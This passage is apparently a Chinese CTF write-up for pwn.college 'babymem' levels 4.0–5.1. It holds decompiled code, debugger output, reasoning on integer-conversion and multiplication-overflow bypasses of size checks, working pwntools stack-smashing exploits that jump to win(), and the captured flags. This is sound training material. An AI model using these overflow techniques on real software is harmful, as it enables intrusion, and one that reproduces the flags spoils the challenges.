正好 read 获取用户输入的时候也把最大输入大小视作无符号数，毕竟输入大小显然不可能为负数。但这也为我们的攻击带来了可能：

1
// ...
2

3
v9 = read(0, buf, LODWORD(nbytes[0]));

Exploit

1
#!/usr/bin/python3
2

3
from pwn import context, ELF, process, remote, gdb, p64
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-4-0"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
c
13
"""
14

15

16
def launch(local=True, debug=False):
17
    if local:
18
        elf = ELF(FILE)
19
        context.binary = elf
20

21
        if debug:
22
            return gdb.debug([elf.path], gdbscript=gdbscript)
23
        else:
24
            return process([elf.path])
25
    else:
26
        return remote(HOST, PORT)
27

28

29
target = launch()
30

31
payload = b"".ljust(0x88, b"A") + p64(0x4020F3)
32

33
target.recvuntil(b"Payload size: ")
34
target.sendline(b"-1")
35
target.recvuntil(b"Send your payload")
36
target.send(payload)
37

38
target.recvall()

Flag

Flag: pwn.college{YWYtWHsecMbA0xSnI1_Yfj-kjlB.0VN5IDL5cTNxgzW}

Level 4.1

Description

Overflow a buffer and smash the stack to obtain the flag, but this time bypass a check designed to prevent you from doing so!

Write-up


9 collapsed lines
1
__int64 challenge()
2
{
3
  int *v0; // rax
4
  char *v1; // rax
5
  size_t nbytes[7]; // [rsp+2Ch] [rbp-44h] BYREF
6
  int v4; // [rsp+64h] [rbp-Ch]
7
  void *buf; // [rsp+68h] [rbp-8h]
8

9
  buf = (char *)nbytes + 4;
10
  memset(nbytes, 0, 50);
11
  printf("Payload size: ");
12
  __isoc99_scanf("%i", nbytes);
13
  if ( SLODWORD(nbytes[0]) > 46 )
14
  {
15
    puts("Provided size is too large!");
16
    exit(1);
17
  }
18
  printf("Send your payload (up to %i bytes)!\n", LODWORD(nbytes[0]));
19
  v4 = read(0, buf, LODWORD(nbytes[0]));
20
  if ( v4 < 0 )
21
  {
22
    v0 = __errno_location();
7 collapsed lines
23
    v1 = strerror(*v0);
24
    printf("ERROR: Failed to read input -- %s!\n", v1);
25
    exit(1);
26
  }
27
  puts("Goodbye!");
28
  return 0LL;
29
}

和上一题思路相同，都是通过有符号数隐式转换为无符号数绕过 payload 长度判断，然后覆盖返回地址。几乎没区别，这里就不再赘述分析过程了。

pwndbg> i fun
20 collapsed lines
All defined functions:

Non-debugging symbols:
0x0000000000401000  _init
0x00000000004010f0  putchar@plt
0x0000000000401100  __errno_location@plt
0x0000000000401110  puts@plt
0x0000000000401120  write@plt
0x0000000000401130  printf@plt
0x0000000000401140  geteuid@plt
0x0000000000401150  read@plt
0x0000000000401160  setvbuf@plt
0x0000000000401170  open@plt
0x0000000000401180  __isoc99_scanf@plt
0x0000000000401190  exit@plt
0x00000000004011a0  strerror@plt
0x00000000004011b0  _start
0x00000000004011e0  _dl_relocate_static_pie
0x00000000004011f0  deregister_tm_clones
0x0000000000401220  register_tm_clones
0x0000000000401260  __do_global_dtors_aux
0x0000000000401290  frame_dummy
0x0000000000401296  bin_padding
0x0000000000401704  win
0x000000000040180b  challenge
0x0000000000401921  main
0x0000000000401a00  __libc_csu_init
2 collapsed lines
0x0000000000401a70  __libc_csu_fini
0x0000000000401a78  _fini
pwndbg> disass challenge
Dump of assembler code for function challenge:
   0x000000000040180b <+0>: endbr64
   0x000000000040180f <+4>: push   rbp
   0x0000000000401810 <+5>: mov    rbp,rsp
55 collapsed lines
   0x0000000000401813 <+8>: sub    rsp,0x70
   0x0000000000401817 <+12>: mov    DWORD PTR [rbp-0x54],edi
   0x000000000040181a <+15>: mov    QWORD PTR [rbp-0x60],rsi
   0x000000000040181e <+19>: mov    QWORD PTR [rbp-0x68],rdx
   0x0000000000401822 <+23>: mov    QWORD PTR [rbp-0x40],0x0
   0x000000000040182a <+31>: mov    QWORD PTR [rbp-0x38],0x0
   0x0000000000401832 <+39>: mov    QWORD PTR [rbp-0x30],0x0
   0x000000000040183a <+47>: mov    QWORD PTR [rbp-0x28],0x0
   0x0000000000401842 <+55>: mov    QWORD PTR [rbp-0x20],0x0
   0x000000000040184a <+63>: mov    DWORD PTR [rbp-0x18],0x0
   0x0000000000401851 <+70>: mov    WORD PTR [rbp-0x14],0x0
   0x0000000000401857 <+76>: lea    rax,[rbp-0x40]
   0x000000000040185b <+80>: mov    QWORD PTR [rbp-0x8],rax
   0x000000000040185f <+84>: mov    DWORD PTR [rbp-0x44],0x0
   0x0000000000401866 <+91>: lea    rdi,[rip+0x89f]        # 0x40210c
   0x000000000040186d <+98>: mov    eax,0x0
   0x0000000000401872 <+103>: call   0x401130 <printf@plt>
   0x0000000000401877 <+108>: lea    rax,[rbp-0x44]
   0x000000000040187b <+112>: mov    rsi,rax
   0x000000000040187e <+115>: lea    rdi,[rip+0x896]        # 0x40211b
   0x0000000000401885 <+122>: mov    eax,0x0
   0x000000000040188a <+127>: call   0x401180 <__isoc99_scanf@plt>
   0x000000000040188f <+132>: mov    eax,DWORD PTR [rbp-0x44]
   0x0000000000401892 <+135>: cmp    eax,0x2e
   0x0000000000401895 <+138>: jle    0x4018ad <challenge+162>
   0x0000000000401897 <+140>: lea    rdi,[rip+0x880]        # 0x40211e
   0x000000000040189e <+147>: call   0x401110 <puts@plt>
   0x00000000004018a3 <+152>: mov    edi,0x1
   0x00000000004018a8 <+157>: call   0x401190 <exit@plt>
   0x00000000004018ad <+162>: mov    eax,DWORD PTR [rbp-0x44]
   0x00000000004018b0 <+165>: mov    esi,eax
   0x00000000004018b2 <+167>: lea    rdi,[rip+0x887]        # 0x402140
   0x00000000004018b9 <+174>: mov    eax,0x0
   0x00000000004018be <+179>: call   0x401130 <printf@plt>
   0x00000000004018c3 <+184>: mov    eax,DWORD PTR [rbp-0x44]
   0x00000000004018c6 <+187>: mov    edx,eax
   0x00000000004018c8 <+189>: mov    rax,QWORD PTR [rbp-0x8]
   0x00000000004018cc <+193>: mov    rsi,rax
   0x00000000004018cf <+196>: mov    edi,0x0
   0x00000000004018d4 <+201>: call   0x401150 <read@plt>
   0x00000000004018d9 <+206>: mov    DWORD PTR [rbp-0xc],eax
   0x00000000004018dc <+209>: cmp    DWORD PTR [rbp-0xc],0x0
   0x00000000004018e0 <+213>: jns    0x40190e <challenge+259>
   0x00000000004018e2 <+215>: call   0x401100 <__errno_location@plt>
   0x00000000004018e7 <+220>: mov    eax,DWORD PTR [rax]
   0x00000000004018e9 <+222>: mov    edi,eax
   0x00000000004018eb <+224>: call   0x4011a0 <strerror@plt>
   0x00000000004018f0 <+229>: mov    rsi,rax
   0x00000000004018f3 <+232>: lea    rdi,[rip+0x86e]        # 0x402168
   0x00000000004018fa <+239>: mov    eax,0x0
   0x00000000004018ff <+244>: call   0x401130 <printf@plt>
   0x0000000000401904 <+249>: mov    edi,0x1
   0x0000000000401909 <+254>: call   0x401190 <exit@plt>
   0x000000000040190e <+259>: lea    rdi,[rip+0x877]        # 0x40218c
   0x0000000000401915 <+266>: call   0x401110 <puts@plt>
   0x000000000040191a <+271>: mov    eax,0x0
   0x000000000040191f <+276>: leave
   0x0000000000401920 <+277>: ret
End of assembler dump.
pwndbg> b *challenge+201
Breakpoint 1 at 0x4018d4
pwndbg> r
Starting program: /home/cub3y0nd/Projects/pwn.college/babymem-level-4-1
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
###
### Welcome to /home/cub3y0nd/Projects/pwn.college/babymem-level-4-1!
###

Payload size: 16
Send your payload (up to 16 bytes)!

Breakpoint 1, 0x00000000004018d4 in challenge ()
20 collapsed lines
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────
 RAX  0x7fffffffd170 ◂— 0
 RBX  0x7fffffffe308 —▸ 0x7fffffffe6bb ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-4-1'
 RCX  0
 RDX  0x10
 RDI  0
 RSI  0x7fffffffd170 ◂— 0
 R8   0x69
 R9   0xfffffffe
 R10  0
 R11  0x202
 R12  1
 R13  0
 R14  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0
 R15  0
 RBP  0x7fffffffd1b0 —▸ 0x7fffffffe1e0 —▸ 0x7fffffffe280 —▸ 0x7fffffffe2e0 ◂— 0
 RSP  0x7fffffffd140 —▸ 0x7fffffffd170 ◂— 0
 RIP  0x4018d4 (challenge+201) ◂— call 0x401150
────────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────────
 ► 0x4018d4 <challenge+201>    call   read@plt                    <read@plt>
        fd: 0 (/dev/pts/2)
        buf: 0x7fffffffd170 ◂— 0
        nbytes: 0x10
30 collapsed lines

   0x4018d9 <challenge+206>    mov    dword ptr [rbp - 0xc], eax
   0x4018dc <challenge+209>    cmp    dword ptr [rbp - 0xc], 0
   0x4018e0 <challenge+213>    jns    challenge+259               <challenge+259>

   0x4018e2 <challenge+215>    call   __errno_location@plt        <__errno_location@plt>

   0x4018e7 <challenge+220>    mov    eax, dword ptr [rax]
   0x4018e9 <challenge+222>    mov    edi, eax
   0x4018eb <challenge+224>    call   strerror@plt                <strerror@plt>

   0x4018f0 <challenge+229>    mov    rsi, rax
   0x4018f3 <challenge+232>    lea    rdi, [rip + 0x86e]     RDI => 0x402168 ◂— 'ERROR: Failed to read input -- %s!\n'
   0x4018fa <challenge+239>    mov    eax, 0                 EAX => 0
──────────────────────────────────────[ STACK ]──────────────────────────────────────
00:0000│ rsp     0x7fffffffd140 —▸ 0x7fffffffd170 ◂— 0
01:0008│-068     0x7fffffffd148 —▸ 0x7fffffffe318 —▸ 0x7fffffffe6f1 ◂— 'SHELL=/usr/bin/zsh'
02:0010│-060     0x7fffffffd150 —▸ 0x7fffffffe308 —▸ 0x7fffffffe6bb ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-4-1'
03:0018│-058     0x7fffffffd158 ◂— 0x10000000a /* '\n' */
04:0020│-050     0x7fffffffd160 —▸ 0x7ffff7f8d5c0 (_IO_2_1_stdout_) ◂— 0xfbad2887
05:0028│-048     0x7fffffffd168 ◂— 0x1000404020 /* ' @@' */
06:0030│ rax rsi 0x7fffffffd170 ◂— 0
07:0038│-038     0x7fffffffd178 ◂— 0
────────────────────────────────────[ BACKTRACE ]────────────────────────────────────
 ► 0         0x4018d4 challenge+201
   1         0x4019e7 main+198
   2   0x7ffff7dcae08
   3   0x7ffff7dcaecc __libc_start_main+140
   4         0x4011de _start+46
─────────────────────────────────────────────────────────────────────────────────────
pwndbg> i frame
Stack level 0, frame at 0x7fffffffd1c0:
 rip = 0x4018d4 in challenge; saved rip = 0x4019e7
 called by frame at 0x7fffffffe1f0
 Arglist at 0x7fffffffd1b0, args:
 Locals at 0x7fffffffd1b0, Previous frame's sp is 0x7fffffffd1c0
 Saved registers:
  rbp at 0x7fffffffd1b0, rip at 0x7fffffffd1b8
pwndbg> distance 0x7fffffffd170 0x7fffffffd1b8
0x7fffffffd170->0x7fffffffd1b8 is 0x48 bytes (0x9 words)

Exploit

1
#!/usr/bin/python3
2

3
from pwn import context, ELF, process, remote, gdb, p64
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-4-1"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
c
13
"""
14

15

16
def launch(local=True, debug=False):
17
    if local:
18
        elf = ELF(FILE)
19
        context.binary = elf
20

21
        if debug:
22
            return gdb.debug([elf.path], gdbscript=gdbscript)
23
        else:
24
            return process([elf.path])
25
    else:
26
        return remote(HOST, PORT)
27

28

29
target = launch()
30

31
payload = b"".ljust(0x48, b"A") + p64(0x401704)
32

33
target.recvuntil(b"Payload size: ")
34
target.sendline(b"-1")
35
target.recvuntil(b"Send your payload")
36
target.send(payload)
37

38
target.recvall()

Flag

Flag: pwn.college{M-FCJzqtx7cmDX7yqpyi7jADAMM.0lN5IDL5cTNxgzW}

Level 5.0

Description

Overflow a buffer and smash the stack to obtain the flag, but this time bypass another check designed to prevent you from doing so!

Write-up


60 collapsed lines
1
__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3)
2
{
3
  int *v3; // rax
4
  char *v4; // rax
5
  _QWORD v6[3]; // [rsp+0h] [rbp-B0h] BYREF
6
  int v7; // [rsp+1Ch] [rbp-94h]
7
  unsigned int v8; // [rsp+28h] [rbp-88h] BYREF
8
  unsigned int v9; // [rsp+2Ch] [rbp-84h] BYREF
9
  _QWORD v10[12]; // [rsp+30h] [rbp-80h] BYREF
10
  __int16 v11; // [rsp+90h] [rbp-20h]
11
  int v12; // [rsp+9Ch] [rbp-14h]
12
  size_t nbytes; // [rsp+A0h] [rbp-10h]
13
  void *buf; // [rsp+A8h] [rbp-8h]
14
  __int64 savedregs; // [rsp+B0h] [rbp+0h] BYREF
15
  _UNKNOWN *retaddr; // [rsp+B8h] [rbp+8h] BYREF
16

17
  v7 = a1;
18
  v6[2] = a2;
19
  v6[1] = a3;
20
  memset(v10, 0, sizeof(v10));
21
  v11 = 0;
22
  buf = v10;
23
  nbytes = 0LL;
24
  puts("The challenge() function has just been launched!");
25
  sp_ = (__int64)v6;
26
  bp_ = (__int64)&savedregs;
27
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v6) >> 3) + 2;
28
  rp_ = (__int64)&retaddr;
29
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
30
  DUMP_STACK(sp_, sz_);
31
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
32
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
33
  puts("including the saved base pointer and the saved return address, for a");
34
  printf("total of %d bytes.\n", 8 * sz_);
35
  printf("The input buffer begins at %p, partway through the stack frame,\n", buf);
36
  puts("(\"above\" it in the stack are other local variables used by the function).");
37
  puts("Your input will be read into this buffer.");
38
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 98);
39
  puts("large input length, and thus overflow the buffer.\n");
40
  puts("In this level, there is no \"win\" variable.");
41
  puts("You will need to force the program to execute the win() function");
42
  puts("by directly overflowing into the stored return address back to main,");
43
  printf(
44
    "which is stored at %p, %d bytes after the start of your input buffer.\n",
45
    (const void *)rp_,
46
    rp_ - (_DWORD)buf);
47
  printf(
48
    "That means that you will need to input at least %d bytes (%d to fill the buffer,\n",
49
    rp_ - (_DWORD)buf + 8,
50
    98);
51
  printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_DWORD)buf - 98);
52
  puts("and 8 that will overwrite the return address).\n");
53
  puts("We have disabled the following standard memory corruption mitigations for this challenge:");
54
  puts("- the canary is disabled, otherwise you would corrupt it before");
55
  puts("overwriting the return address, and the program would abort.");
56
  puts("- the binary is *not* position independent. This means that it will be");
57
  puts("located at the same spot every time it is run, which means that by");
58
  puts("analyzing the binary (using objdump or reading this output), you can");
59
  puts("know the exact value that you need to overwrite the return address with.\n");
60
  puts("This challenge will let you send multiple payload records concatenated together.");
61
  puts("It will make sure that the total payload size fits in the allocated buffer");
62
  puts("on the stack. Can you send a carefully crafted input to break this calculation?");
63
  printf("Number of payload records to send: ");
64
  __isoc99_scanf("%u", &v9);
65
  if ( !v9 )
66
    __assert_fail("record_num > 0", "/challenge/babymem-level-5-0.c", 0x8Fu, "challenge");
67
  printf("Size of each payload record: ");
68
  __isoc99_scanf("%u", &v8);
69
  if ( !v8 )
70
    __assert_fail("record_size > 0", "/challenge/babymem-level-5-0.c", 0x92u, "challenge");
71
  if ( v8 * v9 > 0x62 )
72
    __assert_fail("record_size * record_num <= 98", "/challenge/babymem-level-5-0.c", 0x93u, "challenge");
73
  nbytes = v8 * (unsigned __int64)v9;
74
  printf("Computed total payload size: %lu\n", nbytes);
75
  printf("You have chosen to send %lu bytes of input!\n", nbytes);
76
  printf("This will allow you to write from %p (the start of the input buffer)\n", buf);
11 collapsed lines
77
  printf(
78
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
79
    (char *)buf + nbytes,
80
    nbytes - 98);
81
  printf("Of these, you will overwrite %d bytes into the return address.\n", nbytes + (_DWORD)buf - rp_);
82
  puts("If that number is greater than 8, you will overwrite the entire return address.\n");
83
  puts("You will want to overwrite the return value from challenge()");
84
  printf("(located at %p, %d bytes past the start of the input buffer)\n", (const void *)rp_, rp_ - (_DWORD)buf);
85
  printf("with %p, which is the address of the win() function.\n", win);
86
  puts("This will cause challenge() to return directly into the win() function,");
87
  puts("which will in turn give you the flag.");
88
  puts("Keep in mind that you will need to write the address of the win() function");
89
  puts("in little-endian (bytes backwards) so that it is interpreted properly.\n");
90
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
91
  v12 = read(0, buf, nbytes);
92
  if ( v12 < 0 )
93
  {
94
    v3 = __errno_location();
20 collapsed lines
95
    v4 = strerror(*v3);
96
    printf("ERROR: Failed to read input -- %s!\n", v4);
97
    exit(1);
98
  }
99
  printf("You sent %d bytes!\n", v12);
100
  puts("Let's see what happened with the stack:\n");
101
  DUMP_STACK(sp_, sz_);
102
  puts("The program's memory status:");
103
  printf("- the input buffer starts at %p\n", buf);
104
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
105
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
106
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
107
  printf("- the address of win() is %p.\n", win);
108
  putchar(10);
109
  puts("If you have managed to overwrite the return address with the correct value,");
110
  puts("challenge() will jump straight to win() when it returns.");
111
  printf("Let's try it now!\n\n");
112
  puts("Goodbye!");
113
  return 0LL;
114
}

首先，两个 __isoc99_scanf 都读取无符号数，易想到补码性质和隐式转换问题。其次，读取输入后两条 if 分别判断两个 __isoc99_scanf 输入是否等于零，为零就断言失败。最后，不能满足 v8 * v9 > 0x62 这条判断，也就是输入的两个有符号数相乘（通过反汇编得知这里的乘法使用 imul）的结果必须小于等于 98，否则也会断言失败。

通过程序给出的提示信息我们已经知道 payload 的大小为 144 bytes，所以我们要做的就是想办法满足在 v8 * v9 > 0x62 不成立的前提下获得起码 144 bytes 的输入大小。因为最后 read 的输入的大小是通过 nbytes = v8 * (unsigned __int64)v9; 设置的，所以我们只要关注 v8、v9 的选择。

如果我们输入两个 -1，那确实绕过了 v8 * v9 > 0x62。但是调试发现 nbytes 超出 ssize_t 的大小（显然 0xfffffffe00000001 > 2**63-1）会导致 read 不会读取任何数据，直接返回 -1，最后程序抛出异常并退出：

pwndbg> c
Continuing.

Breakpoint 2, 0x000000000040291c in challenge ()
20 collapsed lines
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
*RAX  0x7ffd77ce3510 ◂— 0
 RBX  0x7ffd77ce46e8 —▸ 0x7ffd77ce55a2 ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-5-0'
 RCX  0
*RDX  0xfffffffe00000001
*RDI  0
*RSI  0x7ffd77ce3510 ◂— 0
*R8   0x75
*R9   0xffffffec
 R10  0
*R11  0x202
 R12  1
 R13  0
 R14  0x796eb2ce0000 (_rtld_global) —▸ 0x796eb2ce12e0 ◂— 0
 R15  0
 RBP  0x7ffd77ce3590 —▸ 0x7ffd77ce45c0 —▸ 0x7ffd77ce4660 —▸ 0x7ffd77ce46c0 ◂— 0
 RSP  0x7ffd77ce34e0 ◂— 0xa /* '\n' */
*RIP  0x40291c (challenge+1342) ◂— call 0x401170
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
 ► 0x40291c <challenge+1342>    call   read@plt                    <read@plt>
        fd: 0 (pipe:[419970])
        buf: 0x7ffd77ce3510 ◂— 0
        nbytes: 0xfffffffe00000001
30 collapsed lines

   0x402921 <challenge+1347>    mov    dword ptr [rbp - 0x14], eax
   0x402924 <challenge+1350>    cmp    dword ptr [rbp - 0x14], 0
   0x402928 <challenge+1354>    jns    challenge+1400              <challenge+1400>

   0x40292a <challenge+1356>    call   __errno_location@plt        <__errno_location@plt>

   0x40292f <challenge+1361>    mov    eax, dword ptr [rax]
   0x402931 <challenge+1363>    mov    edi, eax
   0x402933 <challenge+1365>    call   strerror@plt                <strerror@plt>

   0x402938 <challenge+1370>    mov    rsi, rax
   0x40293b <challenge+1373>    lea    rdi, [rip + 0x147e]     RDI => 0x403dc0 ◂— 'ERROR: Failed to read input -- %s!\n'
   0x402942 <challenge+1380>    mov    eax, 0                  EAX => 0
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp     0x7ffd77ce34e0 ◂— 0xa /* '\n' */
01:0008│-0a8     0x7ffd77ce34e8 —▸ 0x7ffd77ce46f8 —▸ 0x7ffd77ce55d8 ◂— 'MOTD_SHOWN=pam'
02:0010│-0a0     0x7ffd77ce34f0 —▸ 0x7ffd77ce46e8 —▸ 0x7ffd77ce55a2 ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-5-0'
03:0018│-098     0x7ffd77ce34f8 ◂— 0x100000000
04:0020│-090     0x7ffd77ce3500 —▸ 0x7ffd77ce3520 ◂— 0
05:0028│-088     0x7ffd77ce3508 ◂— 0xffffffffffffffff
06:0030│ rax rsi 0x7ffd77ce3510 ◂— 0
07:0038│-078     0x7ffd77ce3518 ◂— 0
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0         0x40291c challenge+1342
   1         0x402b32 main+198
   2   0x796eb2aade08
   3   0x796eb2aadecc __libc_start_main+140
   4         0x4011fe _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> c
Continuing.

Breakpoint 3, 0x0000000000402921 in challenge ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
*RAX  0xffffffffffffffff
 RBX  0x7ffd77ce46e8 —▸ 0x7ffd77ce55a2 ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-5-0'
*RCX  0x796eb2b93c21 (read+17) ◂— cmp rax, -0x1000 /* 'H=' */
*RDX  0xffffffffffffff88
13 collapsed lines
 RDI  0
 RSI  0x7ffd77ce3510 ◂— 0
 R8   0x75
 R9   0xffffffec
 R10  0
*R11  0x246
 R12  1
 R13  0
 R14  0x796eb2ce0000 (_rtld_global) —▸ 0x796eb2ce12e0 ◂— 0
 R15  0
 RBP  0x7ffd77ce3590 —▸ 0x7ffd77ce45c0 —▸ 0x7ffd77ce4660 —▸ 0x7ffd77ce46c0 ◂— 0
 RSP  0x7ffd77ce34e0 ◂— 0xa /* '\n' */
*RIP  0x402921 (challenge+1347) ◂— mov dword ptr [rbp - 0x14], eax
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
   0x40291c <challenge+1342>    call   read@plt                    <read@plt>

 ► 0x402921 <challenge+1347>    mov    dword ptr [rbp - 0x14], eax     [0x7ffd77ce357c] => 0xffffffff
   0x402924 <challenge+1350>    cmp    dword ptr [rbp - 0x14], 0       0xffffffff - 0x0     EFLAGS => 0x286 [ cf PF af zf SF IF df of ]
   0x402928 <challenge+1354>    jns    challenge+1400              <challenge+1400>

   0x40292a <challenge+1356>    call   __errno_location@plt        <__errno_location@plt>

24 collapsed lines
   0x40292f <challenge+1361>    mov    eax, dword ptr [rax]
   0x402931 <challenge+1363>    mov    edi, eax
   0x402933 <challenge+1365>    call   strerror@plt                <strerror@plt>

   0x402938 <challenge+1370>    mov    rsi, rax
   0x40293b <challenge+1373>    lea    rdi, [rip + 0x147e]     RDI => 0x403dc0 ◂— 'ERROR: Failed to read input -- %s!\n'
   0x402942 <challenge+1380>    mov    eax, 0                  EAX => 0
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffd77ce34e0 ◂— 0xa /* '\n' */
01:0008│-0a8 0x7ffd77ce34e8 —▸ 0x7ffd77ce46f8 —▸ 0x7ffd77ce55d8 ◂— 'MOTD_SHOWN=pam'
02:0010│-0a0 0x7ffd77ce34f0 —▸ 0x7ffd77ce46e8 —▸ 0x7ffd77ce55a2 ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-5-0'
03:0018│-098 0x7ffd77ce34f8 ◂— 0x100000000
04:0020│-090 0x7ffd77ce3500 —▸ 0x7ffd77ce3520 ◂— 0
05:0028│-088 0x7ffd77ce3508 ◂— 0xffffffffffffffff
06:0030│ rsi 0x7ffd77ce3510 ◂— 0
07:0038│-078 0x7ffd77ce3518 ◂— 0
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0         0x402921 challenge+1347
   1         0x402b32 main+198
   2   0x796eb2aade08
   3   0x796eb2aadecc __libc_start_main+140
   4         0x4011fe _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>

查看 read 的定义，让我忍不住想吐槽这奇葩的设计：为了能够返回有符号数错误码，返回值类型被设置为 ssize_t，但是可接收的最大输入值类型为 size_t。显然 ssize_t < size_t，也就是说我们提供的输入大小可能超出返回值（输入进去的数据的大小）的可承载范围，如果超出了就抛出 -1。但又没有办法做到返回值类型和最大输入类型的匹配，如果返回值类型改成 size_t 就会出现错误码和输入大小混淆的问题；如果最大输入大小类型改成 ssize_t 又很不合理，因为我们显然不能输入大小为负的内容。

1
// attributes: thunk
2
ssize_t read(int fd, void *buf, size_t nbytes)
3
{
4
  return read(fd, buf, nbytes);
5
}

言归正传，既然我们不能通过最方便的两个 -1 解决问题，那么下面就思考一下整数溢出的其它特点。

我们注意到在判断 v8 * v9 > 0x62 的时候做的都是 32 bits 运算：

 ► 0x40277d <challenge+927>    mov    edx, dword ptr [rbp - 0x88]     EDX, [0x7ffcfb641768] => 0xffffffff
   0x402783 <challenge+933>    mov    eax, dword ptr [rbp - 0x84]     EAX, [0x7ffcfb64176c] => 0xffffffff
   0x402789 <challenge+939>    imul   eax, edx
   0x40278c <challenge+942>    cmp    eax, 0x62                       0x1 - 0x62     EFLAGS => 0x297 [ CF PF AF zf SF IF df of ]
   0x40278f <challenge+945>  ✔ jbe    challenge+978               <challenge+978>

两个 -1 行不通是因为它们相乘得到的无符号结果太大了，超出了 ssize_t 的可容纳范围。那有没有两个数可以在绕过 v8 * v9 > 0x62 且乘积的无符号表示大小不低于 144 的前提下又保证处于 ssize_t 的范围呢？

如果我们提供的输入是 INT32_MAX，或者 INT32_MIN，和 2，或其它任何满足 (v8 * v9) & 0xffffffff == 0x0 的一对数，就可以巧妙的绕过 v8 * v9 > 0x62 的判断了！

这用到了整数溢出的原理，INT32_MAX * 2 或者 INT32_MIN * 2 都会溢出到更高位，低位就变成 0 了。而我们在做判断的时候只使用了低 32 bits，不关心高位的情况，那么只要让低 32 bits 的大小小于等于 0x62 即可。

Exploit

1
#!/usr/bin/python3
2

3
from pwn import context, ELF, process, remote, gdb, p64
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-5-0"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
b *challenge+927
13
b *challenge+1326
14
b *challenge+1342
15
b *challenge+1347
16
c
17
"""
18

19

20
def launch(local=True, debug=False):
21
    if local:
22
        elf = ELF(FILE)
23
        context.binary = elf
24

25
        if debug:
26
            return gdb.debug([elf.path], gdbscript=gdbscript)
27
        else:
28
            return process([elf.path])
29
    else:
30
        return remote(HOST, PORT)
31

32

33
target = launch(debug=False)
34

35
payload = b"".ljust(136, b"A") + p64(0x4022D7)
36

37
INT32_MAX = str((2**31)).encode()
38

39
target.recvuntil(b"Number of payload records to send: ")
40
target.sendline(INT32_MAX)
41
target.recvuntil(b"Size of each payload record: ")
42
target.sendline(b"2")
43
target.sendline(payload)
44

45
target.recvall()

Flag

Flag: pwn.college{AcH-0L9UpmOONC81mhni9OzJVhD.01N5IDL5cTNxgzW}

Level 5.1

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag, but this time bypass another check designed to prevent you from doing so!

Write-up


18 collapsed lines
1
__int64 challenge()
2
{
3
  int *v0; // rax
4
  char *v1; // rax
5
  unsigned int v3; // [rsp+28h] [rbp-98h] BYREF
6
  unsigned int v4; // [rsp+2Ch] [rbp-94h] BYREF
7
  _QWORD v5[14]; // [rsp+30h] [rbp-90h] BYREF
8
  int v6; // [rsp+A0h] [rbp-20h]
9
  __int16 v7; // [rsp+A4h] [rbp-1Ch]
10
  char v8; // [rsp+A6h] [rbp-1Ah]
11
  int v9; // [rsp+ACh] [rbp-14h]
12
  size_t nbytes; // [rsp+B0h] [rbp-10h]
13
  void *buf; // [rsp+B8h] [rbp-8h]
14

15
  memset(v5, 0, sizeof(v5));
16
  v6 = 0;
17
  v7 = 0;
18
  v8 = 0;
19
  buf = v5;
20
  nbytes = 0LL;
21
  printf("Number of payload records to send: ");
22
  __isoc99_scanf("%u", &v4);
23
  if ( !v4 )
24
    __assert_fail("record_num > 0", "/challenge/babymem-level-5-1.c", 0x49u, "challenge");
25
  printf("Size of each payload record: ");
26
  __isoc99_scanf("%u", &v3);
27
  if ( !v3 )
28
    __assert_fail("record_size > 0", "/challenge/babymem-level-5-1.c", 0x4Cu, "challenge");
29
  if ( v3 * v4 > 0x77 )
30
    __assert_fail("record_size * record_num <= 119", "/challenge/babymem-level-5-1.c", 0x4Du, "challenge");
31
  nbytes = v3 * (unsigned __int64)v4;
32
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
33
  v9 = read(0, buf, nbytes);
34
  if ( v9 < 0 )
35
